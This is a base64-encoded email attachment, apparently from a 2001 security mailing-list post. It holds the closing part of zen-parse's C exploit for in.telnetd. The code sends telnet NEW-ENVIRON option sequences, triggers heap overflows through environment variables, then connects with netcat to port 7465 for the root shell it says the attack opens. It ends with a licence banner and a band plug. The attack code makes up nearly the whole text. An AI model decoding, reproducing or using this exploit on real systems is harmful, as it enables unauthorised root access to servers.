KQ0KCXsNCgkgIG1pcGwgPSBhdG9pIChhcmd2WzFdKTsNCgkgIGFyZ3YrKzsN
Cgl9DQoNCiAgICAgIGlmICghc3RyY21wIChhcmd2WzBdLCAiLS1uYW1lIikg
JiYgYXJndlsxXSkNCgl7DQoJICBkYWxlbiA9IHN0cmxlbiAoYXJndlsxXSk7
DQoJICBhcmd2Kys7DQoJfQ0KICAgICAgYXJndisrOw0KICAgIH0NCiAgZnBy
aW50ZiAoc3RkZXJyLCAiICBvIE1pUGwgb2YgJTRkICBvIE5hbWVMZW4gb2Yg
JTJkXG4iLCBtaXBsLCBkYWxlbik7DQogIGlmKGRhbGVuJTM9PTApDQogIHsN
CiAgIG9mZnNldHM9b2Zmc2V0MzsNCiAgfQ0KICBlbHNlDQogIHsNCiAgIG5p
bmJ1Zm9mZnNldCA9IG1pcGwgJSA4MTkyOw0KICAgb2Zmc2V0c1sxMV0gKz0g
MzIgKiAobWlwbCAtIG5pbmJ1Zm9mZnNldCkgLyA4MTkyOw0KICAgaWYgKG9m
ZnNldHNbMTFdID4gMjU1KQ0KICAgICB7DQogICAgICAgZnByaW50ZiAoc3Rk
ZXJyLCAiICAhIE1pUGwgdG9vIGJpZy4iLCBtaXBsLCBkYWxlbik7DQogICAg
ICAgZXhpdCAoMSk7DQogICAgIH0NCiAgIH0NCiAgc29ja19zZXR1cCAoKTsN
CiAgaWYgKGRvc2xlZXApDQogICAgew0KICAgICAgc3lzdGVtICgic2xlZXAg
MTtwcyBhdXh8Z3JlcCBpbi50ZWxuZXRkfGdyZXAgLXYgZ3JlcCIpOw0KICAg
ICAgc2xlZXAgKDgpOw0KICAgIH0NCg0KICBkYWxlbiArPSBzdHJsZW4gKCJc
clxuWyA6IHllc11cclxuIik7DQogIGZwcmludGYgKHN0ZGVyciwgIm8gU2Vu
ZGluZyBJQUMgV0lMTCBORVctRU5WSVJPTk1FTlQuLi5cbiIpOw0KICBmZmx1
c2ggKHN0ZGVycik7DQogIGRvbyAoNSk7DQogIHdpbGwgKDM5KTsNCiAgZmZs
dXNoIChkYXNvY2spOw0KICByZWFkX3NvY2sgKCk7DQogIGZwcmludGYgKHN0
ZGVyciwgIm8gU2V0dGluZyB1cCBlbnZpcm9ubWVudCB2YXJzLi4uXG4iKTsN
CiAgZmZsdXNoIChzdGRlcnIpOw0KICB3aWxsICgxKTsNCiAgcHVzaF9jbGVh
biAoKTsNCiAgZG9lbnYgKCJVU0VSIiwgInplbi1wYXJzZSIpOw0KICBkb2Vu
diAoIlRFUk0iLCAiemVuLXBhcnNlIik7DQogIHdpbGwgKDM5KTsNCiAgZmZs
dXNoIChkYXNvY2spOw0KICBmcHJpbnRmIChzdGRlcnIsICJvIERvaW5nIG92
ZXJmbG93cy4uLlxuIik7DQogIGZmbHVzaCAoc3RkZXJyKTsNCiAgZm9yIChi
ciA9IDA7IChvZmZzZXRzW2JyXSB8fCBvZmZzZXRzW2JyICsgMV0pOyBiciAr
PSAyKQ0KICAgIHsNCiAgICAgIGZpbGwgKG1pcGwgKyBFTlYgKyBvZmZzZXRz
W2JyXSwgb2Zmc2V0c1ticiArIDFdKTsNCiAgICAgIGZmbHVzaCAoZGFzb2Nr
KTsNCiAgICAgIHVzbGVlcCAoMTAwMDAwKTsNCiAgICAgIHJlYWRfc29jayAo
KTsNCiAgICB9DQogIGZwcmludGYgKHN0ZGVyciwgIm8gT3ZlcmZsb3dzIGRv
bmUuLi5cbiIpOw0KICBmZmx1c2ggKHN0ZGVycik7DQogIHB1c2hfY2xlYW4g
KCk7DQoNCiAgZnByaW50ZiAoc3RkZXJyLCAibyBTZW5kaW5nIElBQ3MgdG8g
c3RhcnQgbG9naW4gcHJvY2Vzcy4uLlxuIik7DQogIGZmbHVzaCAoc3RkZXJy
KTsNCiAgd29udCAoMjQpOw0KICB3b250ICgzMik7DQogIHdvbnQgKDM1KTsN
CiAgZnByaW50ZiAoZGFzb2NrLCAiJXMiLCB0b3NlbmQpOw0KICB3aWxsICgx
KTsNCiAgcHVzaF9oZWFwX2F0dGFjayAoKTsNCiAgc2xlZXAgKDEpOw0KICBm
cHJpbnRmIChzdGRlcnIsICJvIEF0dGVtcHRpbmcgdG8gbGF1Y2ggbmV0Y2F0
IHRvIGxvY2FsaG9zdCByb290c2hlbGxcbiIpOw0KICBleGVjbHAgKCJuYyIs
ICJuYyIsICItdiIsICJsb2NhbGhvc3QiLCAiNzQ2NSIsIDApOw0KICBmcHJp
bnRmIChzdGRlcnIsDQoJICAgIm8gSWYgdGhlIGV4cGxvaXQgd29ya2VkLCB0
aGVyZSBzaG91bGQgYmUgYW4gb3BlbiBwb3J0IG9uIDc0NjUuXG4iKTsNCiAg
ZnByaW50ZiAoc3RkZXJyLCAiICBJdCBpcyBhIHJvb3Qgc2hlbGwuIFlvdSBz
aG91bGQgcHJvYmFibHkgY2xvc2UgaXQuXG4iKTsNCiAgZmZsdXNoIChzdGRl
cnIpOw0KICBzbGVlcCAoNjApOw0KICBleGl0ICgwKTsNCn0NCi8qKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKg0KDQogVGhhbmtzIHRvIHhwaGFudG9tIGZvciB0
aGUgaGVscCB3aXRoIGdldHRpbmcgdGhlIHNvbWUgb2YgdGhlIHNvY2tldCAN
CiBzdHVmZiB3b3JraW5nIHByb3Blcmx5LiBFcm0uIEkgZGlkbid0IGVuZCB1
cCB1c2luZyB0aGF0IG1ldGhvZCwgYnV0DQogICAgICAgICAgICAgICAgICAg
ICAgICAgdGhhbmtzIGFueXdheS4gO10NCg0KVGhpcyBjb2RlIGlzIENvcHly
aWdodCAoYykgMjAwMSB6ZW4tcGFyc2UNClVzZSBhbmQgZGlzdHJpYnV0aW9u
IGlzIHVubGltaXRlZCwgcHJvdmlkZWQgdGhlIGNvZGUgaXMgbm90IG1vZGlm
aWVkLg0KSWYgdGhlIGNvZGUsIGluY2x1ZGluZyBhbnkgb2YgdGV4dCBpcyBt
b2RpZmllZCwgdGhhdCB2ZXJzaW9uIG1heSBub3QNCmJlIHJlZGlzdHJ1YnV0
ZWQuDQoNCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqLw0KLyogT2JQbHVnIDQg
TXkgQmFuZDogZ29uZSBwbGF0aW51bSwgQ2hhcGVsIG9mIFN0aWxsZWQgdm9p
Y2VzLCBmcm9tICovDQovKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCiAgICAg
ICAgICAgIFJlbWVtYmVyIHRvIHZpc2l0IENoYXBlbCBvZiBTdGlsbGVkIFZv
aWNlczoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF8gICAg
ICAgICAgICAgICAgIF8gICAgIF8gLiAgLg0KICAgfF8gIF98XyBffF8gIF8g
LiAgLyAvLiAgLiAgXyAgX3wgIF8gIF8gLiAgLiAgLyB8ICAgXyB8XyB8ICB8
DQogICB8IHwgIHwgICB8ICB8X3wuIC8gLyB8XC98IHxffCBffC58XyB8X3x8
XC98IC8gIHxfIHxffCBffCBcLyANCiAgLSAtIC0gLSAtIC0gLXwtIC0gLSAt
IC0gLSAtfC0gLSAtIC0gLSAtIC0gLSAtIC0gLSAtIC0gLSAtIC0gLSAtDQog
ICAgICAgICAgICAgICB8ICAgICAgICAgICAgIHwNCklmIHRoZXJlIGlzIGFu
eXRoaW5nIGJlbG93IHRoZSBuZXh0IGxpbmUgc29tZW9uZSBpcyBub3QgZm9s
bG93aW5nIHRoZQ0KcnVsZXMuICAtLXplbi1wYXJzZQ0KKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqRU5EKioqKioqKioqKioqKioqKioq
KioqKioqKioqKiovDQo=
---1463783680-1194109795-997359229=:10117--
